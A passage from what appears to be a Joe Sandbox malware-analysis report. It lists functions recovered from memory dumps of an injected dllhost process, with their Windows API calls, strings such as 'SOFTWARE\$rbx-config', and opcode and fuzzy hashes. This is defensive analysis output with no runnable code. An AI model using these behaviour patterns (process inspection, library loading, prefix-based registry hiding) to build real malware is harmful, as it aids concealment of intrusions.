Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: B481F83A7803C0CEFA579B25AA41FDD629DBBBE780F0471ADD9E447796DA38C4428700

Function 000001C0401C7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001C0401C7C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001C0401C7CCA
_RTC_Initialize.LIBCMT ref: 000001C0401C7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001C0401C7D1E
__scrt_release_startup_lock.LIBCMT ref: 000001C0401C7D49

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 0cdafcd12d8a8267754769ee7142aa3d2a49fac9378a4526e43c8a55d6935118
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 1081A2316C8641C6FB5FEB659481FEB6291AB8EF8CF4840159F4B777B6DAB8C8418700

Function 000001C0401F9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9B31
GetLastError.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9B3F
LoadLibraryExW.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9B69
FreeLibrary.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9BD7
GetProcAddress.KERNEL32(?,?,?,000001C0401F9C6B,?,?,?,000001C0401F945C,?,?,?,?,000001C0401F8F65), ref: 000001C0401F9BE3

Strings

api-ms-, xrefs: 000001C0401F9B51

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 4f5140ad972371bb917a961e9df586888d60b2ee54106ec86cbc4c74db65ce89
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 95316F31252752D1FE1BEB16A800FEB6394B74DFACF590625AF1E6A7A4DE38C4448310

Function 000001C0401C9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9B31
GetLastError.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9B3F
LoadLibraryExW.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9B69
FreeLibrary.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9BD7
GetProcAddress.KERNEL32(?,?,?,000001C0401C9C6B,?,?,?,000001C0401C945C,?,?,?,?,000001C0401C8F65), ref: 000001C0401C9BE3

Strings

api-ms-, xrefs: 000001C0401C9B51

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 6fa56fcbcd7f737544756ddb81630fc738190fcb906897ac3c9022a9818d5bb5
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 16319231296640E1FE1BDF16A804FE62394BB4DFA8F5A0625EE1B677A4DF38D844C310

Function 000001C040203400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001C040203431
GetLastError.KERNEL32 ref: 000001C04020343D
CloseHandle.KERNEL32 ref: 000001C040203455
CreateFileW.KERNEL32 ref: 000001C040203480
WriteConsoleW.KERNEL32 ref: 000001C04020349F

Strings

CONOUT$, xrefs: 000001C040203461

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: a2ab14e64a64133462c5edd601722e48caf9ca902d41b7ba8d6b43280e4c4360
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: AE118B32250B50C6F756DB52E958B9BA6A4F78CBE8F440224EF5E9BBD4CF78C8048740

Function 000001C0401D3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001C0401D3431
GetLastError.KERNEL32 ref: 000001C0401D343D
CloseHandle.KERNEL32 ref: 000001C0401D3455
CreateFileW.KERNEL32 ref: 000001C0401D3480
WriteConsoleW.KERNEL32 ref: 000001C0401D349F

Strings

CONOUT$, xrefs: 000001C0401D3461

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: b1ab7f924f6da323a37666b2ed111f67b07ea1e6f93795b4ce6fff062c03e4fb
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 16115E31250B40C6F756DB52E854B5AA6A0FB8CFE9F444224EB5F97BA4CF7CD8448740

Function 00000001400017A8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00000001400017DC
RegDeleteKeyW.ADVAPI32 ref: 00000001400017ED
RegEnumKeyExW.ADVAPI32 ref: 000000014000182A
RegCloseKey.ADVAPI32 ref: 000000014000183B
RegDeleteKeyExW.ADVAPI32 ref: 0000000140001858

Strings

SOFTWARE\$rbx-config, xrefs: 00000001400017CE, 0000000140001844

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\$rbx-config
API String ID: 3013565938-3990243012
Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19

Function 000001C0401F6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C0401F62AB
GetThreadContext.KERNEL32 ref: 000001C0401F6415

Part of subcall function 000001C0401F60A0: GetCurrentThreadId.KERNEL32 ref: 000001C0401F60A4

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: cabc01a258e4f2aa80af5b93105548959e3bfcc54fb9505c87108b0efcfe9c34
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 5DD17836248B89C2EA75DB1AE49479A77A0F38CF88F100116EB8E577B5DF78C551CB00

Function 000001C0401C6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001C0401C62AB
GetThreadContext.KERNEL32 ref: 000001C0401C6415

Part of subcall function 000001C0401C60A0: GetCurrentThreadId.KERNEL32 ref: 000001C0401C60A4

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: a9197c9b8b93f14c0c13a63fa18fb151d2d826b71508fe3a90a7e3bc62c36b7a
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 3FD16936288B88C2FA65DB16E49479A77A0F38CF88F100116EB8E57B79DF79C551CB40

Function 000001C0401F2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001C0401F20A6
TlsFree.KERNEL32 ref: 000001C0401F225F
TlsFree.KERNEL32 ref: 000001C0401F226B
TlsFree.KERNEL32 ref: 000001C0401F2277
TlsFree.KERNEL32 ref: 000001C0401F2283
TlsFree.KERNEL32 ref: 000001C0401F228F

Part of subcall function 000001C0401F5E50: GetCurrentThreadId.KERNEL32 ref: 000001C0401F5E66

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 9eccd23449cea70b8449abd76f7d20eab5cdd6dd858dd86f1832d5b0d80129a1
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 0A519931281B46D6FB0EEB24D950AD623A1BB8CB4CF840916E71E667F6EF74C525C380

Function 000001C0401C2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001C0401C20A6
TlsFree.KERNEL32 ref: 000001C0401C225F
TlsFree.KERNEL32 ref: 000001C0401C226B
TlsFree.KERNEL32 ref: 000001C0401C2277
TlsFree.KERNEL32 ref: 000001C0401C2283
TlsFree.KERNEL32 ref: 000001C0401C228F

Part of subcall function 000001C0401C5E50: GetCurrentThreadId.KERNEL32 ref: 000001C0401C5E66

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: a0dae6927981f276a6ac8115aeef4911d1c8257720173d68b69ea820ba4223aa
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 8851A2312C5B45D6FB0AEB24D890ADA23A1BB4CF4CF840815AA2F677B5EF78D554C380

Function 000001C0401F35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001C0401F24D1), ref: 000001C0401F35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001C0401F24D1), ref: 000001C0401F35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001C0401F24D1), ref: 000001C0401F3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001C0401F24D1), ref: 000001C0401F36D9
HeapFree.KERNEL32(?,?,?,?,?,000001C0401F24D1), ref: 000001C0401F36E7

Strings

$rbx-, xrefs: 000001C0401F366C

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 74910829f5822d148a8c8a77f8d869f47f4f9a59f5558fd19638220135215f06
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 87318431741B52D2FB1ADF16D544BAB63A0FB4CF98F0840209F4A57B65EF34C5658700

Function 000001C0401C35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001C0401C24D1), ref: 000001C0401C35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001C0401C24D1), ref: 000001C0401C35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001C0401C24D1), ref: 000001C0401C3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001C0401C24D1), ref: 000001C0401C36D9
HeapFree.KERNEL32(?,?,?,?,?,000001C0401C24D1), ref: 000001C0401C36E7

Strings

$rbx-, xrefs: 000001C0401C366C

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: f7e8685bdfd3d4aa8409c8255c80aaa7433fc70eee2409636f0ef35ad212c045
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: E9318331785B61E2F76ADF16E544BAA67A0FB48F88F0840209F4A57B75EF38D5A18700

Function 000001C0401FC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001C0401FC94F
SetLastError.KERNEL32 ref: 000001C0401FC96E
FlsSetValue.KERNEL32 ref: 000001C0401FC997
FlsSetValue.KERNEL32 ref: 000001C0401FC9A8
FlsSetValue.KERNEL32 ref: 000001C0401FC9B9

Part of subcall function 000001C0401FD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001C0401F674A), ref: 000001C0401FD2B6
Part of subcall function 000001C0401FD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001C0401F674A), ref: 000001C0401FD2C0

SetLastError.KERNEL32 ref: 000001C0401FC9DC

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: dacd4901707bdf25ac528c9142b3259b92f239a8ef18e8c691dbeb7aec19b33e
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: C4114231690293C2FB1EE7316655BEF2152AB8DF9CF544624EB6B763E6CE68C4016340

Function 000001C0401CC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001C0401CC94F
SetLastError.KERNEL32 ref: 000001C0401CC96E
FlsSetValue.KERNEL32 ref: 000001C0401CC997
FlsSetValue.KERNEL32 ref: 000001C0401CC9A8
FlsSetValue.KERNEL32 ref: 000001C0401CC9B9

Part of subcall function 000001C0401CD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001C0401C674A), ref: 000001C0401CD2B6
Part of subcall function 000001C0401CD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001C0401C674A), ref: 000001C0401CD2C0

SetLastError.KERNEL32 ref: 000001C0401CC9DC

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 30e6cc122492ccee0eef9c072facaeda0d20094f022cc320daa57995460d8f21
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: D01130312D8280C2FA5EE771A411BEF61529B8CF9CF544624EA67777E6CE38D8415700

Function 000001C0401F1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001C0401F1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001C0401F1A74
PathFindFileNameW.SHLWAPI ref: 000001C0401F1A83
lstrlenW.KERNEL32 ref: 000001C0401F1A8F
StrCpyW.SHLWAPI ref: 000001C0401F1AA2
CloseHandle.KERNEL32 ref: 000001C0401F1AB0

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: dbf91569eb8733a6cb095e2b32d6a221c8d28c98cabc97931e96b175443a636c
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: C5013931745B92C2FA19EB12A958B9B62A1F78DFC8F4840349F5E53794DE38C5858740

Function 000001C0401C1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001C0401C1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001C0401C1A74
PathFindFileNameW.SHLWAPI ref: 000001C0401C1A83
lstrlenW.KERNEL32 ref: 000001C0401C1A8F
StrCpyW.SHLWAPI ref: 000001C0401C1AA2
CloseHandle.KERNEL32 ref: 000001C0401C1AB0

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
